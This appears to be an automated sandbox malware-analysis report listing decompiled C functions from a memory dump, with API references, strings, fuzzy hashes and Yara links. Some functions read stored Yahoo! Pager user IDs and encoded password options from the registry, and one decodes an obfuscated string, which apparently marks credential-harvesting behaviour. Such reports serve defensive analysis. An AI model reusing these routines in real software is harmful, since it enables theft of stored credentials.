Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81

memcpy.MSVCRT ref: 0041144B

Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA

Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpymemset$strlen
String ID:
API String ID: 2142929671-0
Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94

Uniqueness

Uniqueness Score: -1.00%

Function 004078FF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E004078FF(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x417540 == 0) {
					E0040787D();
				}
				_t40 =  *0x417538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4171b8 == 0) {
							_push( *0x417548 - 1);
							_push( *0x41752c);
							_push(_t39);
							_push(E00407A55());
							goto L16;
						} else {
							strcpy(0x4172c0, "strings");
							_t31 = E00407D89(_t39,  *0x41752c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x417548 - 1);
								_push( *0x41752c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41752c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x417548 - 1);
						_push( *0x41752c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x416b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x412466;
					} else {
						_t23 =  *0x41753c;
						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x417528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41752c, _t10);
							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
							 *( *0x417530 +  *0x417538 * 4) = _t39;
							 *0x417538 =  *0x417538 + 1;
							 *0x41753c =  *0x41753c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}

0x004078ff
0x00407906
0x00407908
0x00407908
0x0040790d
0x00407914
0x00407919
0x0040792b
0x0040792b
0x0040791b
0x0040791b
0x00407926
0x00407929
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407929
0x0040795f
0x0040795f
0x0040792d
0x0040792f
0x00407a50
0x00407a50
0x00407935
0x0040793b
0x0040796e
0x004079ba
0x004079bb
0x004079c1
0x004079c7
0x00000000
0x00407970
0x0040797a
0x00407986
0x0040798b
0x00407990
0x004079a4
0x004079aa
0x004079ab
0x004079b1
0x00000000
0x00407992
0x0040799d
0x004079a2
0x00000000
0x00000000
0x004079a2
0x00407990
0x0040793d
0x00407943
0x00407944
0x0040794d
0x0040794e
0x0040794e
0x004079c8
0x004079ce
0x004079d0
0x004079d0
0x004079d2
0x00407a49
0x00407a49
0x004079d4
0x004079d4
0x004079e3
0x00000000
0x004079f3
0x004079f9
0x004079fc
0x00407a07
0x00407a1d
0x00407a2b
0x00407a36
0x00407a42
0x00407a47
0x00000000
0x00000000
0x00000000
0x00000000
0x00407a47
0x004079e3
0x004079d2
0x00407a54

APIs

strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74E04DE0), ref: 0040797A

Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA

strlen.MSVCRT ref: 00407998
LoadStringA.USER32 ref: 004079C8
memcpy.MSVCRT ref: 00407A07

Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1

Strings

strings, xrefs: 00407970

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$LoadString_itoamemcpystrcpystrlen
String ID: strings
API String ID: 1748916193-3030018805
Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040329E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040329E(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E004021D8( &_v1968);
					if(E0040314D(_t52, _t49, 0) != 0) {
						E00402407(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E004021D8( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E00402407(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}

0x0040329e
0x004032ac
0x004032b6
0x004032bd
0x004032c3
0x004032d3
0x004032da
0x004032da
0x004032ec
0x004032f2
0x0040330c
0x00403314
0x00403390
0x00000000
0x00403316
0x00403316
0x00403319
0x0040331c
0x0040331f
0x00403322
0x00403324
0x00403382
0x00403383
0x0040338a
0x0040338e
0x00000000
0x00000000
0x0040332c
0x00403332
0x0040334a
0x00403367
0x00403367
0x0040336c
0x0040336f
0x00403379
0x00000000
0x0040337b
0x0040337b
0x00000000
0x0040337b
0x00403379
0x00000000
0x00403382
0x00403314
0x00403394

APIs

Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262

memset.MSVCRT ref: 004032F2
GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
strchr.MSVCRT ref: 00403341

Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F

strlen.MSVCRT ref: 00403383

Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B

Strings

Personalities, xrefs: 00403307

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
String ID: Personalities
API String ID: 2103853322-4287407858
Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D

Uniqueness

Uniqueness Score: -1.00%

Function 00410F79, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void _v1031;
				char _v1032;
				void* __esi;
				void* _t25;
				int _t26;

				_t25 = __ecx;
				_t26 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
					}
					RegCloseKey(_v8);
				}
				return _t26;
			}

0x00410f79
0x00410f8a
0x00410f94
0x00410f9b
0x00410fb8
0x00410fd1
0x00411002
0x00411002
0x00411007
0x00411007
0x00411012

APIs

memset.MSVCRT ref: 00410F9B

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007

Strings

Software\Yahoo\Pager, xrefs: 00410FA4
Yahoo! User ID, xrefs: 00410FBF
EOptions string, xrefs: 00410FDA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValuememset
String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
API String ID: 1830152886-1703613266
Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698

Uniqueness

Uniqueness Score: -1.00%

Function 00405F41, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F41(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00405E46(_t15,  &_v1028);
				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}

0x00405f4b
0x00405f4f
0x00405f57
0x00405f57
0x00405f60
0x00405f79
0x00405f9a

APIs

GetLastError.KERNEL32(?), ref: 00405F51
sprintf.MSVCRT ref: 00405F79
MessageBoxA.USER32 ref: 00405F92

Strings

Error, xrefs: 00405F83
Error %d: %s, xrefs: 00405F73

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastMessagesprintf
String ID: Error$Error %d: %s
API String ID: 1670431679-1552265934
Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040F037, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040F037(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040f03e
0x0040f046
0x0040f04e
0x0040f056
0x0040f063
0x0040f063
0x0040f066
0x0040f070

APIs

LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,769048C0,00405C41,00000000), ref: 0040F040
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
FreeLibrary.KERNEL32(00000000), ref: 0040F066

Strings

shlwapi.dll, xrefs: 0040F039
SHAutoComplete, xrefs: 0040F048

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8

Uniqueness

Uniqueness Score: -1.00%

Function 00407406, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046D7( &_v1068);
						if(E004047A0( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t27 =  &_a8; // 0x407626
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060D0(0xff, _t75,  *_t27);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047F1( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}

0x00407412
0x00407415
0x0040741a
0x0040741c
0x00407422
0x00407428
0x00407428
0x00407428
0x00407429
0x0040754a
0x00407438
0x00407446
0x0040744d
0x00407455
0x00407459
0x00407461
0x00407467
0x0040749b
0x0040749b
0x004074a1
0x004074ad
0x004074b6
0x004074bf
0x004074d0
0x004074d7
0x004074e1
0x004074e3
0x004074ed
0x004074ef
0x004074ef
0x004074fc
0x00407503
0x0040750a
0x0040750f
0x00407512
0x00407518
0x00407520
0x00407530
0x00407535
0x00407535
0x004074e1
0x00000000
0x00407541
0x0040746e
0x00407471
0x00407472
0x00407484
0x00407486
0x0040748d
0x0040748e
0x00407491
0x00407491
0x00407492
0x00407492
0x00000000
0x00407472

APIs

strlen.MSVCRT ref: 00407415
memset.MSVCRT ref: 0040744D
memcpy.MSVCRT ref: 0040750A
LocalFree.KERNEL32(?,?,?,?,?,74B5ED80,?,00000000), ref: 00407535

Strings

&v@, xrefs: 0040750F

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeLocalmemcpymemsetstrlen
String ID: &v@
API String ID: 3110682361-3426253984
Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95

Uniqueness

Uniqueness Score: -1.00%

Function 00409695, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405EFD(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405EFD(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405EFD(_a4, "</item>\r\n");
			}

0x004096a7
0x004096ac
0x004096b3
0x004096b6
0x004096c4
0x004096cb
0x004096e7
0x004096f6
0x004096fc
0x00409710
0x0040971b
0x00409720
0x00409723
0x00409724
0x00409729
0x0040973b

APIs

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mt,00000000,?,?,004092ED,00000001,00412B1C,74E04DE0), ref: 00405F17

memset.MSVCRT ref: 004096CB

Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B

Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060

sprintf.MSVCRT ref: 00409710

Strings

<item>, xrefs: 0040969F
<%s>%s</%s>, xrefs: 00409708
</item>, xrefs: 0040972A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 3200591283-2769808009
Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407BF9, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406560(_t30);
				}
				return 1;
			}

0x00407c04
0x00407c07
0x00407c11
0x00407c18
0x00407c23
0x00407c33
0x00407c41
0x00407c49
0x00407c4f
0x00407c55
0x00407c5a
0x00407c5d
0x00407c62
0x00407c68

APIs

GetParent.USER32(?), ref: 00407C0B
GetWindowRect.USER32 ref: 00407C18
GetClientRect.USER32 ref: 00407C23
MapWindowPoints.USER32 ref: 00407C33
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C8, Relevance: 7.5, APIs: 5, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4C8(void* __eax) {
				void* __esi;
				void* _t16;
				void* _t33;
				void* _t38;
				void* _t41;

				_t41 = __eax;
				_t16 = E00401033();
				if(_t16 == 0x5cb8) {
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
					E00405E2C();
					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
					E0040A437(_t41);
					SetCursor( *0x416b98);
					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
				}
				return _t16;
			}

0x0040a4c9
0x0040a4cb
0x0040a4d5
0x0040a4f5
0x0040a4f7
0x0040a504
0x0040a518
0x0040a522
0x0040a52f
0x0040a532
0x0040a53d
0x0040a54f
0x00000000
0x0040a569
0x0040a56b

APIs

SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5

Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518

Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0

SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
String ID:
API String ID: 2210206837-0
Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10

Uniqueness

Uniqueness Score: -1.00%

Function 00409867, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409018(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}

0x00409881
0x00409883
0x0040988a
0x00409899
0x004098a0
0x004098ad
0x004098b9
0x004098bd
0x004098c3
0x004098d7
0x004098f1

APIs

memset.MSVCRT ref: 0040988A
memset.MSVCRT ref: 004098A0

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mt,00000000,?,?,004092ED,00000001,00412B1C,74E04DE0), ref: 00405F17

Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060

sprintf.MSVCRT ref: 004098D7

Strings

<%s>, xrefs: 004098D1
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3202206310-1998499579
Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
